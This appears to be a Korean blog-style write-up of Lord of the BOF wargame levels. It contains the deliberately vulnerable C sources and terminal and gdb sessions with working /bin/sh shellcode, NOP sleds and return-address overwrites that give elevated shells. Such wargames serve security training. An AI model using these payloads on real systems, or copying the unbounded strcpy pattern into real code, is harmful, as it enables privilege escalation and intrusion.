
[darkelf@localhost darkelf]$ cat orge.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orge

        - check argv[0]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


/*
 * Entry point of the "orge" challenge binary (intentionally vulnerable
 * wargame source, reproduced as-is).
 *
 * Requires at least one argument and an argv[0] of exactly 77 bytes.
 * Zeroes every environment string, validates argv[1], copies it into a
 * 40-byte stack buffer with strcpy(), echoes it, and zeroes the buffer.
 *
 * Defects visible in this listing:
 *  - the length check only rejects argv[1] longer than 48 bytes while
 *    `buffer` holds 40, so strcpy() can write up to 9 bytes (48 characters
 *    plus the terminating NUL) past the end of `buffer`;
 *  - argv[1][47] is read before that length check, so a shorter argv[1]
 *    is read past its terminator;
 *  - strlen/memset/strcpy are used without <string.h> (implicit
 *    declarations), and main has neither a return type nor a return.
 */
main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){ // argv[1] is required below

printf("argv error\n");

exit(0);

}


// here is changed! -- the invoked program path (argv[0]) must be exactly 77 bytes long

if(strlen(argv[0]) != 77){ // any other argv[0] length exits; the check is on exact equality, not "shorter than"

                printf("argv[0] error\n");

                exit(0);

}


// egghunter: zero every environment string in place (strlen() of each string is taken before it is cleared)

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf') // byte 48 of argv[1] must be 0xbf; read before the length check, so a short argv[1] is read out of bounds here

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument: rejects more than 48 bytes, but `buffer` is only 40 bytes

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); // unbounded copy of up to 48 bytes + NUL into the 40-byte buffer: stack overflow

printf("%s\n", buffer);


        // buffer hunter: zero the local buffer before returning

        memset(buffer, 0, 40);

}


[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xc0\xfb\xff\xbf"'//우선은 프로그램명 길이를 77로 맟추고 공격시도

j

 X?Rh//shh/bin??S?訴€?????????????????????적

Segmentation fault (core dumped)

[darkelf@localhost darkelf]$ gdb -q orgi core

Core was generated by `.////////////////////////////////////////////////////////////////////////orgi j'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffff7 in ?? ()

(gdb) x/50wx $esp

0xbffffa10: 0x00000000 0xbffffa54    0xbffffa60    0x40013868

0xbffffa20: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffa30: 0x08048500 0x00000002 0xbffffa54    0x08048390

0xbffffa40: 0x0804866c 0x4000ae60 0xbffffa4c    0x40013e90

0xbffffa50: 0x00000002 0xbffffb52    0xbffffba0    0x00000000

0xbffffa60: 0xbffffbd1    0xbffffbe3    0xbffffbfa     0xbffffc19

0xbffffa70: 0xbffffc3b    0xbffffc48    0xbffffe0b    0xbffffe2a

0xbffffa80: 0xbffffe47    0xbffffe5c    0xbffffe7b    0xbffffe86

0xbffffa90: 0xbffffe9e    0xbffffeae    0xbffffeb6    0xbffffec0

0xbffffaa0: 0xbffffed0    0xbffffede    0xbffffeec    0xbffffefd

0xbffffab0: 0xbfffff08     0xbfffff1b     0xbfffff5e     0x00000000

0xbffffac0: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffad0: 0x00000005 0x00000006

(gdb)  

0xbffffad8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffae8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffaf8: 0x0000000b 0x000001fa 0x0000000c 0x000001fa

0xbffffb08: 0x0000000d 0x000001fa 0x0000000e 0x000001fa

0xbffffb18: 0x00000010 0x0febfbff    0x0000000f 0xbffffb4d

0xbffffb28: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb38: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffb48: 0x00000000 0x38366900 0x2f2e0036 0x2f2f2f2f

0xbffffb58: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb68: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb78: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb88: 0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f    0x2f2f2f2f

0xbffffb98: 0x6f2f2f2f    0x00696772

(gdb) 

0xbffffba0:0x99580b6a 0x2f2f6852      0x2f686873  0x896e6962

0xbffffbb0:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffbc0: 0x90909090 0x90909090 0x90909090 0xbffffbc0

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000

(gdb) quit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'` //제대로 된 리턴어드레스를 넣고 공격.

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ exit

exit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orge"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ my-pass

euid = 507

하하♥

시험공부하겠다며 소셜미디어를 끊고..

엘오비를 하고있네요!!!!!!!!! 이게뭐야!!!!!!!!

NOTES:

argv[0]=절대경로

./는 //가 몇개있어도 상관없다

.이랑 orgi=5

77-5=72

페이로드는 전단계것을 씀

그런데 쉘코드가 저장되는 곳은 어디일까? 버퍼가 아닌데



[wolfman@localhost wolfman]$ cat darkelf.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkelf 

        - egghunter + buffer hunter + check length of argv[1]

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


/*
 * Entry point of the "darkelf" challenge binary (intentionally vulnerable
 * wargame source, reproduced as-is).
 *
 * Requires at least one argument. Zeroes every environment string,
 * validates argv[1], copies it into a 40-byte stack buffer with strcpy(),
 * echoes it, and zeroes the buffer.
 *
 * Defects visible in this listing:
 *  - the length check only rejects argv[1] longer than 48 bytes while
 *    `buffer` holds 40, so strcpy() can write up to 9 bytes (48 characters
 *    plus the terminating NUL) past the end of `buffer`;
 *  - argv[1][47] is read before that length check, so a shorter argv[1]
 *    is read past its terminator;
 *  - strlen/memset/strcpy are used without <string.h> (implicit
 *    declarations), and main has neither a return type nor a return.
 */
main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){ // argv[1] is required below

printf("argv error\n");

exit(0);

}


// egghunter: zero every environment string in place (strlen() of each string is taken before it is cleared)

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf') // byte 48 of argv[1] must be 0xbf; read before the length check, so a short argv[1] is read out of bounds here

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument: rejects more than 48 bytes, but `buffer` is only 40 bytes

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


strcpy(buffer, argv[1]); // unbounded copy of up to 48 bytes + NUL into the 40-byte buffer: stack overflow

printf("%s\n", buffer);


        // buffer hunter: zero the local buffer before returning

        memset(buffer, 0, 40);

}

[wolfman@localhost wolfman]$ vi darkelv.c  /*우선 복사본을 만들어놓습니다*/

[wolfman@localhost wolfman]$ gcc darkelv.c -o darkelv

[wolfman@localhost wolfman]$ ./darkelv `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x13, "\xbf"'`

j

 X?Rh//shh/bin??S?訴€????????????????????????

Segmentation fault (core dumped)

[wolfman@localhost wolfman]$ gdb -q darkelv core

Core was generated by `./darkelv j

                                  X?Rh//shh/bin??S?訴€?????????????????????????.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbf909090 in ?? ()

(gdb) x/50wx $esp /*뜯어서 쉘코드가 어디들어가는지 봤습니다.*/

0xbffffae0: 0x00000000 0xbffffb24    0xbffffb30    0x40013868

0xbffffaf0: 0x00000002 0x08048450 0x00000000 0x08048471

0xbffffb00: 0x08048500 0x00000002 0xbffffb24    0x08048390

0xbffffb10: 0x0804864c 0x4000ae60 0xbffffb1c    0x40013e90

0xbffffb20: 0x00000002 0xbffffc1e    0xbffffc28    0x00000000

0xbffffb30: 0xbffffc59    0xbffffc6b    0xbffffc82    0xbffffca1

0xbffffb40: 0xbffffcc3    0xbffffcd0    0xbffffe93    0xbffffeb2

0xbffffb50: 0xbffffecf     0xbffffee4    0xbfffff03     0xbfffff0e

0xbffffb60: 0xbfffff26            0xbfffff36     0xbfffff3e     0xbfffff48

0xbffffb70: 0xbfffff58     0xbfffff66     0xbfffff74     0xbfffff85

0xbffffb80: 0xbfffff90     0xbfffffa3     0xbfffffe6     0x00000000

0xbffffb90: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffba0: 0x00000005 0x00000006

(gdb) 

0xbffffba8: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffbb8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffbc8: 0x0000000b 0x000001f9 0x0000000c 0x000001f9

0xbffffbd8: 0x0000000d 0x000001f9 0x0000000e 0x000001f9

0xbffffbe8: 0x00000010 0x0febfbff     0x0000000f  0xbffffc19

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc18: 0x38366900 0x2f2e0036      0x6b726164 0x00766c65

0xbffffc28:0x99580b6a 0x2f2f6852       0x2f686873 0x896e6962 //NOP미끄럼틀과 함께..

0xbffffc38:0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x90909090 0x90909090 0xbf909090

0xbffffc58: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc68: 0x00000000 0x00000000

(gdb) 

0xbffffc70: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc80: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc90: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffd30: 0x00000000 0x00000000

(gdb) quit

[wolfman@localhost wolfman]$ ./darkelv `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x28\xfc\xff\xbf"'` /*저 주소값을 넣고 다시 공격합니다*/

j

 X?Rh//shh/bin??S?訴€?????????????????????(?

bash$ my-pass

euid = 505

love eyuna

bash$ quit

sh: quit: command not found

bash$ exit

exit

[wolfman@localhost wolfman]$ ./darkelf `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x28\xfc\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€?????????????????????(?

bash$ my-pass

euid = 506

//쉘이 따였습니다.

후후 하나를푸니 포풍돌파네여

근데.. 푸는방법쓰기 귀찮아서 (다시볼겸 풀이추가했습니다).. 그냥 쉘코드 주소찾고 넣은거에요ㅋㅋ


/*1. Bash2 실행*/

[orc@localhost orc]$ bash2

/*2. 소스를 봅시다*/

[orc@localhost orc]$ cat wolfman.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - wolfman

        - egghunter + buffer hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


/*
 * Entry point of the "wolfman" challenge binary (intentionally vulnerable
 * wargame source, reproduced as-is).
 *
 * Requires at least one argument. Zeroes every environment string, checks
 * one byte of argv[1], copies argv[1] into a 40-byte stack buffer with
 * strcpy(), echoes it, and zeroes the buffer.
 *
 * Defects visible in this listing:
 *  - there is no length check at all: strcpy() copies argv[1] of any
 *    length into the 40-byte `buffer` (stack overflow);
 *  - argv[1][47] is read unconditionally, so an argv[1] shorter than
 *    48 bytes is read past its terminator;
 *  - strlen/memset/strcpy are used without <string.h> (implicit
 *    declarations), and main has neither a return type nor a return.
 */
main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){ // argv[1] is required below

printf("argv error\n");

exit(0);

}


// egghunter: zero every environment string in place (strlen() of each string is taken before it is cleared)

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf') // byte 48 of argv[1] must be 0xbf; out-of-bounds read when argv[1] is shorter than 48 bytes

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]); // unbounded copy into the 40-byte buffer; nothing limits argv[1]'s length

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);    // zero all 40 bytes of buffer after it has been printed

}

/*여기서, 버퍼는 사용할 수 없다는 것을 알게됩니다. 그래서 대충 페이로드를 짜서 넣어봅니다.*/

[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x47, "\xbf", "\x90"x16,"\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` 

???????????????????????????????????????????????퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€

Segmentation fault (core dumped) //코더덤프☆를 주니까 까봅시다.

/*3. gdb -q(환영메세지 없애기) '프로그램 이름' 'core'*/

[orc@localhost orc]$ gdb -q wolvman core

Core was generated by `./wolvman ???????????????????????????????????????????????퓧???????????????j

                    X?R'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbf909090 in ?? ()

(gdb) x/50wx $esp

0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffae0: 0x99580b6a 0x2f2f6852   0x2f686873 0x896e6962

0xbffffaf0: 0x895352e3 0x0080cde1 0xbffffb14    0x08048390

0xbffffb00: 0x0804861c 0x4000ae60 0xbffffb0c    0x40013e90

0xbffffb10: 0x00000002 0xbffffc13     0xbffffc1d    0x00000000

0xbffffb20: 0xbffffc75    0xbffffc83         0xbffffc9a    0xbffffcb9

0xbffffb30: 0xbffffcdb    0xbffffce4     0xbffffea7    0xbffffec6

0xbffffb40: 0xbffffedf     0xbffffef4     0xbfffff0f      0xbfffff1a

0xbffffb50: 0xbfffff32     0xbfffff3e     0xbfffff46     0xbfffff50

0xbffffb60: 0xbfffff60     0xbfffff6e     0xbfffff7c         0xbfffff8d

0xbffffb70: 0xbfffff98     0xbfffffa7     0xbfffffe6     0x00000000

0xbffffb80: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb90: 0x00000005 0x00000006

(gdb) 

0xbffffb98: 0x00000006 0x00001000 0x00000007 0x40000000

0xbffffba8: 0x00000008 0x00000000 0x00000009 0x08048450

0xbffffbb8: 0x0000000b 0x000001f8 0x0000000c 0x000001f8

0xbffffbc8: 0x0000000d 0x000001f8 0x0000000e 0x000001f8

0xbffffbd8: 0x00000010 0x0febfbff    0x0000000f 0xbffffc0e

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc08: 0x00000000 0x36690000 0x2e003638 0x6c6f772f

0xbffffc18: 0x6e616d76 0x90909000 0x90909090 0x90909090

0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc38: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffffc48: 0x90909090 0x909090bf 0x90909090 0x90909090

0xbffffc58: 0x90909090 0x580b6a90

(gdb) quit

/*제가 이 문제를 풀었을때는 쉘코드가 0xbffffc37지점에 있었는데 말이죠..;;....... 

암튼 공격해봤습니다.*/

[orc@localhost orc]$ ./wolvman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'` 

????????????????????????????????????????????7?퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€?????????????????????


bash$ exit     //잘되네여

exit

[orc@localhost orc]$ ./wolfman `perl -e 'print "\x90"x44, "\x37\xfc\xff\xbf", "\x90"x16, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10'` 

????????????????????????????????????????????7?퓧???????????????j

                                                                 X?Rh//shh/bin??S?訴€?????????????????????

bash$ my-pass

euid = 505    //땋

이번엔.. 쉽게풀었네요ㅋㅋ


/* 1. 소스코드를 확인합니다. */

/* 소스코드를 복사해 복사본을 만들어주시기 바랍니다. 여기서는 orx가 그 경우입니다.*/

[goblin@localhost goblin]$ cat orc.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - orc

        - egghunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


/*
 * Entry point of the "orc" challenge binary (intentionally vulnerable
 * wargame source, reproduced as-is).
 *
 * Requires at least one argument. Zeroes every environment string, checks
 * one byte of argv[1], copies argv[1] into a 40-byte stack buffer with
 * strcpy() and echoes it. The buffer is not cleared afterwards.
 *
 * Defects visible in this listing:
 *  - there is no length check at all: strcpy() copies argv[1] of any
 *    length into the 40-byte `buffer` (stack overflow);
 *  - argv[1][47] is read unconditionally, so an argv[1] shorter than
 *    48 bytes is read past its terminator;
 *  - strlen/memset/strcpy are used without <string.h> (implicit
 *    declarations), and main has neither a return type nor a return.
 */
main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){ // argv[1] is required below

printf("argv error\n");

exit(0);

}


// egghunter: zero every environment string in place (strlen() of each string is taken before it is cleared)

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf') // byte 48 of argv[1] must be 0xbf; out-of-bounds read when argv[1] is shorter than 48 bytes

{

printf("stack is still your friend.\n");

exit(0);

}


strcpy(buffer, argv[1]); // unbounded copy into the 40-byte buffer; nothing limits argv[1]'s length

printf("%s\n", buffer);

}


/* 2. \xff가 인식되도록 bash2를 사용합니다. */

[goblin@localhost goblin]$ bash2


/* 3. 그냥 찾다가 얻은 리턴어드레스로 해봅니다.*/

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11'` `perl -e 'print "\x90"x9, "\xac\xfa\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€??????????? //안되네여.


/* 4. gdb로 까서 주소를 얻어보았습니다. call strcpy에 브포를 걸고 `perl -e 'print"\x90"x47, "\xbf"'`이런식으로 48번째 바이트에 \xbf를 넣고 구경하다보니 나왔습니다(기억안남ㅋ;;;) */

[goblin@localhost goblin]$ ./orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x48\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????H?

Illegal instruction (core dumped)


[goblin@localhost goblin]$ gdb -q orx 

(gdb) disas main

Dump of assembler code for function main:

0x8048500 <main>: push   %ebp

0x8048501 <main+1>: mov    %esp,%ebp

0x8048503 <main+3>: sub    $0x2c,%esp

0x8048506 <main+6>: cmpl   $0x1,0x8(%ebp)

0x804850a <main+10>: jg     0x8048523 <main+35>

0x804850c <main+12>: push   $0x8048640

0x8048511 <main+17>: call   0x8048410 <printf>

0x8048516 <main+22>: add    $0x4,%esp

0x8048519 <main+25>: push   $0x0

0x804851b <main+27>: call   0x8048420 <exit>

0x8048520 <main+32>: add    $0x4,%esp

0x8048523 <main+35>: nop    

0x8048524 <main+36>: movl   $0x0,0xffffffd4(%ebp)

0x804852b <main+43>: nop    

0x804852c <main+44>: lea    0x0(%esi,1),%esi

0x8048530 <main+48>: mov    0xffffffd4(%ebp),%eax

0x8048533 <main+51>: lea    0x0(,%eax,4),%edx

0x804853a <main+58>: mov    0x8049764,%eax

0x804853f <main+63>:         cmpl   $0x0,(%eax,%edx,1)

0x8048543 <main+67>: jne    0x8048547 <main+71>

0x8048545 <main+69>: jmp    0x8048587 <main+135>

0x8048547 <main+71>: mov    0xffffffd4(%ebp),%eax

0x804854a <main+74>: lea    0x0(,%eax,4),%edx

0x8048551 <main+81>: mov    0x8049764,%eax

0x8048556 <main+86>: mov    (%eax,%edx,1),%edx

0x8048559 <main+89>: push   %edx

0x804855a <main+90>: call   0x80483f0 <strlen>

0x804855f <main+95>:  add    $0x4,%esp

0x8048562 <main+98>: mov    %eax,%eax

0x8048564 <main+100>: push   %eax

0x8048565 <main+101>: push   $0x0

0x8048567 <main+103>: mov    0xffffffd4(%ebp),%eax

---Type <return> to continue, or q <return> to quit---

0x804856a <main+106>: lea    0x0(,%eax,4),%edx

0x8048571 <main+113>: mov    0x8049764,%eax

0x8048576 <main+118>: mov    (%eax,%edx,1),%edx

0x8048579 <main+121>: push   %edx

0x804857a <main+122>: call   0x8048430 <memset>

0x804857f <main+127>: add    $0xc,%esp

0x8048582 <main+130>: incl   0xffffffd4(%ebp)

0x8048585 <main+133>: jmp    0x8048530 <main+48>

0x8048587 <main+135>: mov    0xc(%ebp),%eax

0x804858a <main+138>: add    $0x4,%eax

0x804858d <main+141>: mov    (%eax),%edx

0x804858f <main+143>: add    $0x2f,%edx

0x8048592 <main+146>: cmpb   $0xbf,(%edx)

0x8048595 <main+149>: je     0x80485b0 <main+176>

0x8048597 <main+151>: push   $0x804864c

0x804859c <main+156>: call   0x8048410 <printf>

0x80485a1 <main+161>: add    $0x4,%esp

0x80485a4 <main+164>: push   $0x0

0x80485a6 <main+166>: call   0x8048420 <exit>

0x80485ab <main+171>: add    $0x4,%esp

0x80485ae <main+174>: mov    %esi,%esi

0x80485b0 <main+176>: mov    0xc(%ebp),%eax

0x80485b3 <main+179>: add    $0x4,%eax

0x80485b6 <main+182>: mov    (%eax),%edx

0x80485b8 <main+184>: push   %edx

0x80485b9 <main+185>: lea    0xffffffd8(%ebp),%eax

0x80485bc <main+188>: push   %eax

0x80485bd <main+189>: call   0x8048440 <strcpy>

0x80485c2 <main+194>: add    $0x8,%esp

0x80485c5 <main+197>: lea    0xffffffd8(%ebp),%eax

0x80485c8 <main+200>: push   %eax

0x80485c9 <main+201>: push   $0x8048669

0x80485ce <main+206>: call   0x8048410 <printf>

---Type <return> to continue, or q <return> to quit---

0x80485d3 <main+211>: add    $0x8,%esp

0x80485d6 <main+214>: lea    0xffffffd8(%ebp),%eax

0x80485d9 <main+217>: push   %eax

0x80485da <main+218>: push   $0x804866d

0x80485df <main+223>: call   0x8048410 <printf>

0x80485e4 <main+228>: add    $0x8,%esp

0x80485e7 <main+231>: leave  

0x80485e8 <main+232>: ret    

0x80485e9 <main+233>: nop    

0x80485ea <main+234>: nop    

0x80485eb <main+235>: nop    

0x80485ec <main+236>: nop    

0x80485ed <main+237>: nop    

0x80485ee <main+238>: nop    

0x80485ef <main+239>: nop    

End of assembler dump.


/* 5. strcpy 브포. */

(gdb) b *main+189

Breakpoint 1 at 0x80485bd

(gdb) r `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x65\xfc\x90\xbf"'`

Starting program: /home/goblin/orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x65\xfc\x90\xbf"'`


Breakpoint 1, 0x80485bd in main ()

(gdb) x/50wx $esp

0xbffffb6c: 0xbffffdbd    0xbffffddb    0xbffffdf3     0xbffffdfe

0xbffffb7c: 0xbffffe0f     0xbffffe20    0xbffffe28     0x00000000

0xbffffb8c: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb9c: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffbac: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffbbc: 0x00000009 0x08048450 0x0000000b 0x000001f7

0xbffffbcc: 0x0000000c 0x000001f7 0x0000000d 0x000001f7

0xbffffbdc: 0x0000000e 0x000001f7 0x00000010 0x0febfbff

0xbffffbec: 0x0000000f 0xbffffc1e     0x00000000 0x00000000

0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc1c: 0x36690000 0x2f003638 0x656d6f68 0x626f672f

0xbffffc2c: 0x2f6e696c 0x0078726f

(gdb) 

0xbffffc34: 0x99580b6a    0x2f2f6852     0x2f686873  0x896e6962 //쉘코드가요기잉네

0xbffffc44: 0x895352e3   0x9080cde1 0x90909090 0x90909090  //0xbffffc34?35?

0xbffffc54: 0x90909090 0x90909090 0x90909090 0xbf90fc65

0xbffffc64: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffcf4: 0x00000000 0x00000000

(gdb) quit

The program is running.  Exit anyway? (y or n) y


/* 6. 복사본에 시도해봅니다.*/

[goblin@localhost goblin]$ ./orx `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x35\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????5?

bash$         //오옹 되넹

bash$ exit

exit


/* 7. 원본에 시도해봅니다. */

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x35\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????5?

Segmentation fault            //안되네여 하핳ㅎ하핳하하핳

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x34\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????4?

Illegal instruction


/*이 시점에선 그냥 34~40까지 해보자 하고 끝값을 마구마구 대입했습니다*/

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x33\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????3?

Segmentation fault

[goblin@localhost goblin]$ ./orc `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\x90"x11,"\x90"x10, "\x36\xfc\xff\xbf"'` 

j

 X?Rh//shh/bin??S?訴€?????????????????????6?

Illegal instruction

